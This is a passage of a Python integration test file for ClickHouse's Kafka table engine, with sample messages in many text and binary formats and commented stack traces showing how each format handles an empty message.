'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
# 'tombstone' record (null value) = marker of deleted record
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='kafka_json_as_string', key='xxx')
producer.flush()
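# Neither the empty message nor the tombstone should produce rows; the contains_in_log
# assertion at the end of this test checks for the corresponding "return no rows" message.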
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
# data was dumped from ClickHouse itself in the following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
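# Each all_formats entry below provides:
#   'data_sample'          - [single-row message, multi-row message (ids 1..15), single-row message]
#   'supports_empty_value' - whether the format tolerates an empty Kafka message
#   'extra_settings'       - extra format-specific engine settings (e.g. schema or regexp options)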
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit this test and is tested separately (see test_kafka_json_as_string above)
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
